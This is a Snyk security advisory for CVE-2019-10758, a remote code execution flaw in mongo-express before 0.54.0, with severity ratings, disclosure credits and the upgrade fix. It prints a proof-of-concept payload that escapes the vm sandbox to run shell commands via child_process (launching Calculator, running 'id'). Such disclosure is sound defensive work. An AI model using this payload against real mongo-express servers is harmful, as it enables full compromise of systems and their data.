<p>Upgrade <code>mongo-express</code> to version 0.54.0 or higher.</p>

Remote Code Execution (RCE) Affecting mongo-express package, versions <0.54.0

Snyk CVSS

Attack Complexity Low

Scope Changed

Confidentiality High

Integrity High

Availability High

Threat Intelligence

Exploit Maturity Mature

EPSS 97.46% (100^th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk ID SNYK-JS-MONGOEXPRESS-473215
published 16 Oct 2019
disclosed 14 Oct 2019
credit Jonathan Leitschuh

Report a new vulnerability Found a mistake?

Introduced: 14 Oct 2019

CVE-2019-10758 Open this link in a new tab CWE-94 Open this link in a new tab First added by Snyk

How to fix?

Upgrade mongo-express to version 0.54.0 or higher.

Overview

mongo-express is a web-based MongoDB admin interface written with Node.js, Express and Bootstrap3

Affected versions of this package are vulnerable to Remote Code Execution (RCE) via endpoints that use the toBSON method. A misuse of the vm dependency to perform exec commands in a non-safe environment.

PoC by Jonathan Leitschuh

# MacOS
this.constructor.constructor("return process")().mainModule.require('child_process').execSync('/Applications/Calculator.app/Contents/MacOS/Calculator')

  it('should not be executable', function () {
      const test = `
      this.constructor.constructor("return console")().log(this.constructor.constructor("return process")().mainModule.require('child_process').execSync('id').toString())
      `;
      const result = bson.toBSON(calculatorTest);
    });